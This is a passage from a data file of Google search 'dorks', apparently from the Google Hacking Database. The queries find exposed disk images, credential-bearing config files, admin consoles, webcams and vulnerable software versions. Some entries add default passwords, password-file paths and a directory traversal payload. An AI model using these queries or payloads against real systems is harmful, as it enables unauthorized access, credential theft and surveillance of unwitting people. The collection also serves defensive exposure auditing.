http://www.securityfocus.com/bid/11719[descr]]
[[url]http://www.google.com/search?num=100&q=%2B%22Powered+by+Invision+Power+Board+v2.0.0..2%22[url]]
[[dork]+"Powered by Invision Power Board v2.0.0..2"[dork]]
[end][861]]
[[start][862]
[[title]ext:gho gho[[title]]
[[descr]Norton Ghost allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything![descr]]
[[url]http://www.google.com/search?q=ext%3Agho+gho[url]]
[[dork]ext:gho gho[dork]]
[end][862]]
[[start][863]
[[title]ext:pqi pqi -database[[title]]
[[descr]PQ DriveImage allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything![descr]]
[[url]http://www.google.com/search?q=ext%3Apqi+pqi+-database[url]]
[[dork]ext:pqi pqi -database[dork]]
[end][863]]
[[start][864]
[[title]ext:vmdk vmdk[[title]]
[[descr]VMWare allows PC emulation across a variety of platforms. These files are VMWare disk images which essentially contain a copy of an entire PC, which could contain almost anything.[descr]]
[[url]http://www.google.com/search?q=ext:vmdk+vmdk&num=100&filter=0[url]]
[[dork]ext:vmdk vmdk[dork]]
[end][864]]
[[start][865]
[[title]ext:vmx vmx[[title]]
[[descr]VMWare allows PC emulation across a variety of platforms. Theseconfiguration files describe a virtual PC, and reveal information about that PC's hardware settings.[descr]]
[[url]http://www.google.com/search?q=ext:vmx+vmx&num=100&filter=0[url]]
[[dork]ext:vmx vmx[dork]]
[end][865]]
[[start][866]
[[title]inurl:filezilla.xml -cvs[[title]]
[[descr]filezilla.xml contains Sites,Logins and crypted Passwords of ftp connections made with the open source programm filezilla. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Afilezilla.xml+-cvs[url]]
[[dork]inurl:filezilla.xml -cvs[dork]]
[end][866]]
[[start][869]
[[title]+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl[[title]]
[[descr]phpbb is vulnerable to SQL Injection, allowing people to minipulate the query into pulling data (such as passwords). Arbituary EXEC allows an attacker (if they get on to a new line), to execute their own PHP, which can be fatal.
[descr]]
[[url]http://www.google.com/search?num=100&q=+%2B%22Powered+by+phpBB+2.0.6..10%22+-phpbb.com+-phpbb.pl[url]]
[[dork] +"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl[dork]]
[end][869]]
[[start][870]
[[title]"Copyright (c) Tektronix, Inc." "printer status"[title]]
[[descr]Captain, the Phasers are online :)
[descr]]
[[url]http://www.google.com/search?num=100&q=%22Copyright+%28c%29+Tektronix%2C+Inc.%22+%22printer+status%22[url]]
[[dork]"Copyright (c) Tektronix, Inc." "printer status"[dork]]
[end][870]]
[[start][871]
[[title]intext:"MaiLinX Alert (Notify)" -site:networkprinters.com[[title]]
[[descr]Xerox DocuPrint printer models.[descr]]
[[url]http://www.google.com/search?num=100&q=intext%3A%22MaiLinX+Alert+%28Notify%29%22+-site%3Anetworkprinters.com[url]]
[[dork]intext:"MaiLinX Alert (Notify)" -site:networkprinters.com[dork]]
[end][871]]
[[start][872]
[[title]inurl:"printer/main.html" intext:"settings"[title]]
[[descr]Brother HL Printers.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=inurl%3A%22printer%2Fmain.html%22+intext%3A%22settings%22&btnG=Search[url]]
[[dork]inurl:"printer/main.html" intext:"settings"[dork]]
[end][872]]
[[start][873]
[[title]inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo[[title]]
[[descr]Mercury SiteScope designed to ensure the availability and performance of distributed IT infrastructures — e.g., servers, operating systems, network devices, network services, applications, and components. Some pages may be IP restricted.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%22sitescope.html%22+intitle%3A%22sitescope%22+intext%3A%22refresh%22+-demo&btnG=Google+Search[url]]
[[dork]inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo[dork]]
[end][873]]
[[start][874]
[[title]axis storpoint "file view" inurl:/volumes/[[title]]
[[descr]The Axis Storpoint device turns a SCSI or ATA box with lots of cdrom players (or writers) into a cd tower which can be browsed through any browser. The default admin password combo = root/pass. CD access can be password restricted like in Apache. Axis uses it's own server software. Many vulnerabilities can be found in the security databases like SF.[descr]]
[[url]http://www.google.com/search?q=axis+storpoint+%22file+view%22+inurl%3A%2Fvolumes%2F[url]]
[[dork]axis storpoint "file view" inurl:/volumes/[dork]]
[end][874]]
[[start][875]
[[title]inurl:"/axs/ax-admin.pl" -script[[title]]
[[descr]This system records visits to your site. This admin script allows you to display these records in meaningful graph and database formats.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%22%2Faxs%2Fax-admin.pl%22+-script[url]]
[[dork]inurl:"/axs/ax-admin.pl" -script[dork]]
[end][875]]
[[start][876]
[[title]"Generated by phpSystem"[title]]
[[descr]PhpSystem shows info about unix systems, including: General Info (kernel, cpu, uptime), Connections, Who Is Logged In, Memory, Swap and active mounts.[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Generated+by+phpSystem%22[url]]
[[dork]"Generated by phpSystem"[dork]]
[end][876]]
[[start][877]
[[title]php-addressbook "This is the addressbook for *" -warning[[title]]
[[descr]php-addressbook shows user address information without a password.[descr]]
[[url]http://www.google.com/search?q=php-addressbook++%22This+is+the+addressbook+for+*%22+-warning[url]]
[[dork]php-addressbook "This is the addressbook for *" -warning[dork]]
[end][877]]
[[start][878]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][878]]
[[start][879]
[[title]intitle:"Multimon UPS status page"[title]]
[[descr]Multimon provide UPS monitoring services
[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][879]]
[[start][880]
[[title]intitle:"Mail Server CMailServer Webmail" "5.2"[title]]
[[descr]CMailServer is a small mail webmail server. Multiple vulnerabilities were found, including buffer overflow, SQL Injection and XXS.
http://www.securiteam.com/windowsntfocus/6E00M2KBPS.html[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22Mail+Server+CMailServer+Webmail%22+%225.2%22[url]]
[[dork]intitle:"Mail Server CMailServer Webmail" "5.2"[dork]]
[end][880]]
[[start][881]
[[title]intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org[[title]]
[[descr]This search uses desktop.ini to track users with a webserver running on their desktop computers. It can easily be extended to find specific documents.[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22index+of%22+%22parent+directory%22+%22desktop.ini%22+site%3Adyndns.org&btnG=Google+Search[url]]
[[dork]intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org[dork]]
[end][881]]
[[start][882]
[[title]intitle:"Live NetSnap Cam-Server feed"[title]]
[[descr]Netsnap Online Cameras[descr]]
[[url]http://www.google.com/search?q=intitle:%22Live+NetSnap+Cam-Server+feed%22[url]]
[[dork]intitle:"Live NetSnap Cam-Server feed"[dork]]
[end][882]]
[[start][883]
[[title]intitle:"V-Gear BEE"[title]]
[[descr]V-Gear Bee Web Cameras[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22V-Gear+BEE%22[url]]
[[dork]intitle:"V-Gear BEE"[dork]]
[end][883]]
[[start][884]
[[title]intitle:"AudioReQuest.web.server"[title]]
[[descr]Audio ReQuest home CD/MP3 player. Various information about the configuration of the host and surrounding network can be found out by visiting the main page of this server. Beyond that, you could peruse someones MP3 collection![descr]]
[[url]http://www.google.com/search?q=intitle%3A%22AudioReQuest.web.server%22[url]]
[[dork]intitle:"AudioReQuest.web.server"[dork]]
[end][884]]
[[start][885]
[[title]filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"[title]]
[[descr]Dshield is a distributed intrusion detection system. The ipinfo.php script includes a whois lookup form.[descr]]
[[url]http://www.google.com/search?q=filetype%3Aphp+inurl%3Aipinfo.php+%22Distributed+Intrusion+Detection+System%22[url]]
[[dork]filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"[dork]]
[end][885]]
[[start][886]
[[title]ext:cfg radius.cfg[[title]]
[[descr]"Radiator is a highly configurable and flexible Radius server that supports authentication by nearly 60 different types of authentication methods"
This search finds configuration files for this server, revealing its behaviour, methods for authenticating users, etc.[descr]]
[[url]http://www.google.com/search?q=ext:cfg+radius.cfg&hl=en&lr=&filter=0[url]]
[[dork]ext:cfg radius.cfg[dork]]
[end][886]]
[[start][889]
[[title]intitle:"VitalQIP IP Management System"[title]]
[[descr]The VitalQIP Web Client Interface provides a World Wide Web interface for the VitalQIP IP Management software. The purpose of the VitalQIP Web Client Interface is to allow users to add, modify, and delete IP addresses; create configuration and data files; and generate reports. It is not a fully functional user interface, such as the VitalQIP Windows or VitalQIP UNIX Clients. Certain options, such as infrastructure or policy management, are not provided. The VitalQIP Web Client Interface software is based on HTML and Perl, so your organization can customize it to meet your requirements.
Vendors site: http://www.lucent.com/products/solution/0,,CTID+2020-STID+10438-SOID+1456-LOCL+1,00.html
[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][889]]
[[start][891]
[[title]inurl:"/stCenter.nsf/" -demo[[title]]
[[descr]With Sametime products you can collaborate with your colleagues in real time. You can schedule meetings. You can administer your Sametime produkt through a web interface.(You can see who is online and send quick messages to answer specific questions. You can work with team members in remote locations by sharing and jointly editing data during online meetings.)
http://www-306.ibm.com/software/lotus/sw-atoz/indexS.html[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][891]]
[[start][892]
[[title]intitle:"start.managing.the.device" remote pbx acc[[title]]
[[descr]MCK Communications, Inc.
PBXgatewayII
High density central site gateway for remote PBX access
(MCK Communications is now known as VESO.)[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22start.managing.the.device%22+remote+pbx+access+&sourceid[url]]
[[dork]intitle:"start.managing.the.device" remote pbx access [dork]]
[end][892]]
[[start][893]
[[title]intext:"powered by Web Wiz Journal"[title]]
[[descr]Web Wiz Journal ASP Blog.
The MDB database is mostly unprotected and can be downloaded directly. The DB contains administrative acccounts
filename: journal.mdb
admin login: admin.html
[descr]]
[[url]http://www.google.com/search?q=intext:%22powered+by+Web+Wiz+Journal%22&hl=en&lr=&c2coff=1&start=10&sa=N[url]]
[[dork]intext:"powered by Web Wiz Journal"[dork]]
[end][893]]
[[start][894]
[[title]intitle:"vhost" intext:"vHost . 2000-2004"[title]]
[[descr]vHost is a one-step solution for all virtual hosting needs. It enables a Linux/BSD server with single or multiple IP addresses to function as unlimited virtual hosts with HTTP, FTP, SMTP, POP3, IMAP, and other virtual services extentable via modules. It comes with both command-line and web-based graphical user interfaces, which give maximum control to a domain's owner, while relieving the system administrator of most routine administration tasks. [descr]]
[[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22vhost%22+intext%3A%22vHost+.+2000-2004%22&btnG=Search[url]]
[[dork]intitle:"vhost" intext:"vHost . 2000-2004"[dork]]
[end][894]]
[[start][895]
[[title]allintext:"Powered by LionMax Software" "WWW File Share"[title]]
[[descr]WWW File Share Pro is a small HTTP server that can help you share files with your friends. They can download files from your computer or upload files from theirs. Simply specify a directory for downloads and a directory for uploads.
All servers can be accessed anonymously[descr]]
[[url]http://www.google.com/search?hl=en&c2coff=1&q=allintext%3A%22Powered+by+LionMax+Software%22+%22WWW+File+Share%22&btnG=Zoeken&lr=[url]]
[[dork]allintext:"Powered by LionMax Software" "WWW File Share"[dork]]
[end][895]]
[[start][896]
[[title]inurl:":631/printers" -php -demo[[title]]
[[descr]CUPS provides a portable printing layer for UNIX®-based operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. CUPS uses the Internet Printing Protocol ("IPP") as the basis for managing print jobs and queues. The Line Printer Daemon ("LPD") Server Message Block ("SMB"), and AppSocket (a.k.a. JetDirect).[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&q=inurl%3A%22%3A631%2Fprinters%22+-php+-demo&btnG=Search[url]]
[[dork]inurl:":631/printers" -php -demo[dork]]
[end][896]]
[[start][897]
[[title]ext:dat bpk.dat[[title]]
[[descr]Perfect Keylogger is as the name says a keylogger :)
This dork finds the corresponding datafiles which can be read with the free downloadable lite version.[descr]]
[[url]http://www.google.com/search?q=ext:dat+bpk.dat&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]ext:dat bpk.dat[dork]]
[end][897]]
[[start][898]
[[title]intitle:"iVISTA.Main.Page"[title]]
[[descr]And again another webcam search. MOst of these cams seem to be security cams[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22iVISTA.Main.Page%22&sourceid=firefox&start=0&start=0&ie=utf-8&oe=utf-8[url]]
[[dork]intitle:"iVISTA.Main.Page"[dork]]
[end][898]]
[[start][899]
[[title]inurl:2506/jana-admin[[title]]
[[descr]The JanaServer 2 is amongst other things a proxy server, that makes it possible for LAN members, everyone or a group as a part of the LAN, to access the internet via a Modem, ISDN or DSL connection. For this the program must be installed on the computer, that can access the internet by an installed modem, ISDN or a DSL adapter.[descr]]
[[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3A2506%2Fjana-admin+&btnG=Search[url]]
[[dork]inurl:2506/jana-admin [dork]]
[end][899]]
[[start][900]
[[title]intitle:"Spam Firewall" inurl:"8000/cgi-bin/index.cgi"[title]]
[[descr]The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization. [descr]]
[[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22Spam+Firewall%22+inurl%3A%228000%2Fcgi-bin%2Findex.cgi%22&btnG=Search[url]]
[[dork]intitle:"Spam Firewall" inurl:"8000/cgi-bin/index.cgi"[dork]]
[end][900]]
[[start][901]
[[title]inurl:ds.py[[title]]
[[descr]Affordable Web-based document and content management application lets businesses of every size rapidly deploy a world-class Enterprise Content Management (ECM) solution to help reduce costs, optimize information flow, and reduce risk[descr]]
[[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3Ads.py&btnG=Search[url]]
[[dork]inurl:ds.py[dork]]
[end][901]]
[[start][902]
[[title]inurl:"1220/parse_xml.cgi?"[title]]
[[descr]Quicktime streaming server is uhhhhh.....well it's a streaming server and it can be managed via http. No need to say more.
Darwin Streaming Server is the opensource version (for *NUX os's).
Some are pass protected, others not.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%221220%2Fparse_xml%22[url]]
[[dork]inurl:"1220/parse_xml"[dork]]
[end][902]]
[[start][903]
[[title]intitle:"MX Control Console" "If you can't remember"[title]]
[[descr]MX Logic’s customizable and easy-to-use MX Control ConsoleSM is a centralized email threat management policy platform that provides you with one interface for managing all corporate-wide email threats, protection and security. With the MX Control Console, you can easily configure and control your email protection and security based on your overall corporate email policies. [descr]]
[[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22MX+Control+Console%22+%22If+you+can%27t+remember%22&btnG=Search[url]]
[[dork]intitle:"MX Control Console" "If you can't remember"[dork]]
[end][903]]
[[start][904]
[[title]intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm[[title]]
[[descr]See and control JVC webcameras, you can move the camera, zoom... change the settings, etc....[descr]]
[[url]http://www.google.com/search?q=intext%3A%22Welcome+to+the+Web+V.Networks%22+intitle%3A%22V.Networks+%5BTop%5D%22+-filetype%3Ahtm+[url]]
[[dork]intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm [dork]]
[end][904]]
[[start][905]
[[title]intitle:"WebLogic Server" intitle:"Console Login" inurl:console[[title]]
[[descr]BEA WebLogic Server 8.1 provides an industrial-strength application infrastructure for developing, integrating, securing, and managing distributed service-oriented applications. By simplifying and unifying the enterprise infrastructure, IT organizations can now deliver greater value in less time, at reduced cost to the overall business. [descr]]
[[url]http://www.google.com/search?q=intitle:%22WebLogic+Server%22+intitle:%22Console+Login%22+inurl:console[url]]
[[dork]intitle:"WebLogic Server" intitle:"Console Login" inurl:console[dork]]
[end][905]]
[[start][906]
[[title]ext:conf inurl:rsyncd.conf -cvs -man[[title]]
[[descr]rsync is an open source utility that provides fast incremental file transfer.
rsync can also talk to "rsync servers" which can provide anonymous or authenticated rsync.
The configuration files contain data about peers and paths[descr]]
[[url]http://www.google.com/search?q=ext:conf+inurl:rsyncd.conf+-cvs+-man&hl=en&lr=&filter=0[url]]
[[dork]ext:conf inurl:rsyncd.conf -cvs -man[dork]]
[end][906]]
[[start][907]
[[title]inurl:"phpOracleAdmin/php" -download -cvs[[title]]
[[descr]phpOracleAdmin is intended to be a webbased Oracle Object Manager.
In many points alike phpMyAdmin, it should offer more comfort and possibilities. Interestingly these managers are not password protected.[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22phpOracleAdmin%2Fphp%22+-download+-cvs[url]]
[[dork]inurl:"phpOracleAdmin/php" -download -cvs[dork]]
[end][907]]
[[start][908]
[[title]inurl:1810 "Oracle Enterprise Manager"[title]]
[[descr]Enterprise Manager 10g Grid Control provides a single tool that can monitor and manage not only every Oracle software element in your grid, but also Web applications, hosts, and the network in between. Grid Control is also extensible via an SDK so customers can use it to monitor additional components that are not supported out-of-the box.[descr]]
[[url]http://www.google.com/search?q=inurl%3A1810+%22Oracle+Enterprise+Manager%22[url]]
[[dork]inurl:1810 "Oracle Enterprise Manager"[dork]]
[end][908]]
[[start][909]
[[title]"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )[[title]]
[[descr]Invision Power File Manager is a popular file management script, written in the popular PHP Scripting Language. It is compatiable with all forms of Unix and Windows and allows the user to control their files via any modern browser.[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+Invision+Power+File+Manager%22+%28inurl%3Alogin.php%29+%7C+%28intitle%3A%22Browsing+directory+%2F%22+%29+&btnG=Search[url]]
[[dork]"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" ) [dork]]
[end][909]]
[[start][910]
[[title]intitle:"Novell Web Services" intext:"Select a service and a language."[title]]
[[descr]"Novell® GroupWise is an enterprise collaboration system that provides secure e-mail, calendaring, scheduling, and instant messaging. GroupWise also includes task management, contact management, document management, and other productivity tools. GroupWise can be used on your desktop on Linux, Windows*, or Macintosh; in a Web browser anywhere you have an Internet connection; and even on wireless devices. Your GroupWise system can be set up on NetWare®, Linux, Windows, or any combination of these operating systems." [descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][910]]
[[start][911]
[[title]ext:php intext:"Powered by phpNewMan Version"[title]]
[[descr]PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more. PHP News Manager is vulnerable to a directory traversal problem.
path/to/news/browse.php?clang=../../../../../../file/i/want
[descr]]
[[url]http://www.google.com/search?q=ext:php+intext:%22Powered+by+phpNewMan+Version%22+[url]]
[[dork]ext:php intext:"Powered by phpNewMan Version" [dork]]
[end][911]]
[[start][912]
[[title]intitle:"Cayman-DSL.home"[title]]
[[descr]Cayman DSL modems. Many Cayman units have a weakness where even if remote administration is disabled, some older firmwares will still allow validation if proper login credentials are supplied. In many cases, simply hitting enter will be enough to authenticate. It's worth noting, many of the vulnerable devices also support telnet right out of the box, as opposed to the linksys models which require a firmware patch.
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Cayman-DSL.home%22&btnG=Search[url]]
[[dork]intitle:"Cayman-DSL.home"[dork]]
[end][912]]
[[start][913]
[[title]intitle:"Index of /CFIDE/" administrator[[title]]
[[descr]With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.
The search that pulls up directory listings we probably shouldn't be seeing.. entering the 'administrator' directory brings up a ColdFusion login screen[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Index+of+%2FCFIDE%2F%22+administrator&btnG=Search[url]]
[[dork]intitle:"Index of /CFIDE/" administrator[dork]]
[end][913]]
[[start][914]
[[title]intitle:"Athens Authentication Point"[title]]
[[descr]Athens is an Access Management system for controlling access to web based subscription services. It offers:
* secure single username access to multiple web-based access controlled services
* devolved administration facilities at organisation level
* remote access user accounts
* encrypted account bulk upload facilities
* scalable services with 3 million accounts
* replication facilities at several separate physical locations, offering a resilient authentication service [descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Athens+Authentication+Point%22&btnG=Search[url]]
[[dork]intitle:"Athens Authentication Point"[dork]]
[end][914]]
[[start][915]
[[title]ext:ini eudora.ini[[title]]
[[descr]Well, this is the configuration file for Eudora...may contain sensitive information like pop servers, logins and encypted passwords sometimes.[descr]]
[[url]http://www.google.com/search?q=ext:ini+eudora.ini&hl=en&lr=&filter=0[url]]
[[dork]ext:ini eudora.ini[dork]]
[end][915]]
[[start][916]
[[title]inurl:preferences.ini "emule]"[title]]
[[descr]This finds the emule configuration file which contains some general and proxy information.
Sometimes proxy user and password are stored.[descr]]
[[url]http://www.google.com/search?q=inurl%3Apreferences.ini+%22%5Bemule%5D%22[url]]
[[dork]inurl:preferences.ini "[emule]"[dork]]
[end][916]]
[[start][917]
[[title]intitle:index.of abyss.conf[[title]]
[[descr]These directories reveal the configuration file of the abyss webserver. These files can contain passwords.[descr]]
[[url]http://www.google.com/search?q=intitle%3Aindex.of+abyss.conf[url]]
[[dork]intitle:index.of abyss.conf[dork]]
[end][917]]
[[start][918]
[[title]ext:php program_listing intitle:MythWeb.Program.Listing[[title]]
[[descr]MythTV is a homebrew PVR project that I've been working on in my spare time. It's been under heavy development for two years, and is now quite useable and featureful[descr]]
[[url]http://www.google.com/search?q=ext:php+program_listing+intitle:MythWeb.Program.Listing[url]]
[[dork]ext:php program_listing intitle:MythWeb.Program.Listing[dork]]
[end][918]]
[[start][919]
[[title]intitle:Login intext:"RT is © Copyright"[title]]
[[descr]RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.
Versions including 2.0.13 are vulnerable to injection, check out
SecurityFocus BID 7509[descr]]
[[url]http://www.google.com/search?q=intitle%3ALogin+intext%3A%22RT+is+%C2%A9+Copyright%22&btnG=Search[url]]
[[dork]intitle:Login intext:"RT is © Copyright"[dork]]
[end][919]]
[[start][920]
[[title]intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"[title]]
[[descr]The bitboard2 is a board that need no database to work. So it is useful for webmaster that have no access to a sql database.
The password file can be retrieve from
/admin/data_passwd.dat[descr]]
[[url]http://www.google.com/search?&q=intext%3A%22%22BiTBOARD+v2.0%22+BiTSHiFTERS+Bulletin+Board%22[url]]
[[dork]intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"[dork]]
[end][920]]
[[start][921]
[[title]intitle:"welcome.to.squeezebox"[title]]
[[descr]Squeezebox is the easiest way for music lovers to enjoy high-quality playback of their whole digital music collection. Stream music from your computer to anywhere in your home. Works with iTunes and provides a powerful web interface for control from any computer on your network.
This is neat, on top of giving out all sorts of enumeration information, it also allows one to paruse the music collection on the box, as well as listen if you install the aplet. Way cool.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22welcome.to.squeezebox%22+[url]]
[[dork]intitle:"welcome.to.squeezebox" [dork]]
[end][921]]
[[start][931]
[[title][[title]]
[[descr]
Some of the sites are very, very interesting - try a search substituting site:gov instead of site:com, or try site:edu or site:org or site:fm. Anyway, camera servers made by Axis Video, you can look up administrator manuals online via the following search string (guess what you might find there?):
site:com inurl:axis video server manuals
Can you say default UID and PW?
What's really interesting is if you look hard enough; you can find cameras within government and educational labs; airport surveillance; even some stretches of I65 in the US (for those of you close to the Ohio River area).
Anyway this search string gets you into the server; from there you can have many controls or few controls over the cameras (including zoom, pan, and iris). There is much to see and most of the cameras have easy acccess to admin profile via click of a button - of course from there you have to provide a UID & PW. But read up on the manuals any you may get lucky.
Bottom line, if you can control the camera (via admin priv.) you can control what and when the camera & server view as well as what & when they record. Just a small seed for a possibly big idea - your ambitions may vary.
Rate it! Give me feedback! I will not learn without some form of criticism...yet despite how insignificant that criticism may make me feel...i enjoy the search for the unseen/unknown knowledge nonetheless...it was worth it.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][931]]
[[start][933]
[[title]allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"[title]]
[[descr]Frontpage extensions for Unix ? So be it..[descr]]
[[url]http://www.google.com/search?num=100&q=allinurl%3A%22%2F*%2F_vti_pvt%2F%22+%7C+allinurl%3A%22%2F*%2F_vti_cnf%2F%22[url]]
[[dork]allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"[dork]]
[end][933]]
[[start][934]
[[title]filetype:cnf inurl:_vti_pvt access.cnf[[title]]
[[descr]The access.cnf file is a "weconfigfile" (webconfig file) used by Frontpage Extentions for Unix. The install script called change_server.sh processes them. These files leak information about the realm name and the full path on the server for it. [descr]]
[[url]http://www.google.com/search?num=100&q=filetype%3Acnf+inurl%3A_vti_pvt+access.cnf[url]]
[[dork]filetype:cnf inurl:_vti_pvt access.cnf[dork]]
[end][934]]
[[start][935]
[[title]inurl:"install/install.php"[title]]
[[descr]This searches for the install.php file. Most results will be a Bulletin board like Phpbb etc.
This will let an attacker install the forum again. There is an exploit available on the Net which lets you see DB info.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=inurl%3A%22install%2Finstall.php%22[url]]
[[dork]inurl:"install/install.php"[dork]]
[end][935]]
[[start][936]
[[title]intitle:"index of" inurl:ftp (pub | incoming)[[title]]
[[descr]Adding "inurl:ftp (pub | incoming)" to the "index.of" searches helps locating ftp websites. This query can easily be narrowed further with additional keywords.
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22index+of%22+inurl%3Aftp+%28pub+%7C+incoming%29[url]]
[[dork]intitle:"index of" inurl:ftp (pub | incoming)[dork]]
[end][936]]
[[start][937]
[[title]filetype:blt "buddylist"[title]]
[[descr]AIM buddylists.[descr]]
[[url]http://www.google.com/search?hl=en&q=filetype%3Ablt+%22buddylist%22[url]]
[[dork]filetype:blt "buddylist"[dork]]
[end][937]]
[[start][938]
[[title]intitle:"index.of" .diz .nfo last modified[[title]]
[[descr]File_id.diz is a description file uploaders use to describe packages uploaded to FTP sites. Although rooted in legitimacy, it is used largely by software piracy groups to describe their ill gotten goods. Systems administrators finding file_id.diz in directory listings on their servers may discover their boxes have been hacked and are being used as a distroubtion site for pirated software.
.nfo's often contain info on which piracy group the files have passed through on their way to their final resting place. This helps weed out false positives.
[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][938]]
[[start][939]
[[title]intitle:"Sipura.SPA.Configuration" -.pdf[[title]]
[[descr]Query returns configuration pages for online Voice over IP devices. Discloses an obscene amount of information about the target, including most all routing information and access to control user's telephone system.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Sipura.SPA.Configuration%22+-.pdf&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"Sipura.SPA.Configuration" -.pdf[dork]]
[end][939]]
[[start][940]
[[title]intitle:"Azureus : Java BitTorrent Client Tracker"[title]]
[[descr]This query shows machines using the Azureus BitTorrent client's built-in tracker - the pages are quite simple in the information they give out, simply a list of active torrents.
This information may be useful for people wanting to find active BitTorrent trackers for downloading .torrent files from, or for people wanting to find these trackers to shut them down :) [descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22Azureus+%3A+Java+BitTorrent+Client+Tracker%22&btnG=Google+Search[url]]
[[dork]intitle:"Azureus : Java BitTorrent Client Tracker"[dork]]
[end][940]]
[[start][941]
[[title]intitle:"BNBT Tracker Info"[title]]
[[descr]This query shows pages which summarise activity on BNBT-powered BitTorrent trackers - including all the torrents currently being "tracked", the BNBT software version, links to user-lists and 'admin' pages, etc.
This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. Some versions of BNBT are also vulnerable to a DOS attack. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful![descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22BNBT+Tracker+Info%22&btnG=Google+Search[url]]
[[dork]intitle:"BNBT Tracker Info"[dork]]
[end][941]]
[[start][942]
[[title]intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"[title]]
[[descr]This query shows pages which summarise activity on PHPBT-powered BitTorrent trackers - all the torrents currently being "tracked".
This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!
Often, the URL involved can be changed to access the configuration / installation / deletion script.. which are obviously *not* intended for public access, even if the statistics page is.[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22PHPBTTracker+Statistics%22+%7C+intitle%3A%22PHPBT+Tracker+Statistics%22&btnG=Google+Search[url]]
[[dork]intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"[dork]]
[end][942]]
[[start][943]
[[title]"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq[[title]]
[[descr]Query: "Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq
Background: WordPress is a blogging software which is vulnerable to a few SQL injection queries.
http://securityfocus.com/bid/12066/exploit/[descr]]
